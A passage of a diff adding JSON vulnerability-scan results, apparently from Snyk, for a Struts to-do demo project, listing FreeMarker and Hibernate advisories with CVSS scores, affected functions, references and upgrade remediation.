"CVE": [], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.freemarker:freemarker", + "proprietary": false, + "creationTime": "2021-02-19T11:41:17.941362Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-09T11:33:30Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.freemarker", + "artifactId": "freemarker" + }, + "publicationTime": "2021-02-19T15:54:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:04:29.670906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19" + ], + "upgradePath": [ 
+ false, + "org.apache.struts:struts2-core@2.5.25", + "org.freemarker:freemarker@2.3.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.freemarker:freemarker", + "version": "2.3.19" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", 
+ "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and 
frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": 
"toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": 
"org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. 
A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
"org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", 
+ "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. 
ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + 
"format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
"org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
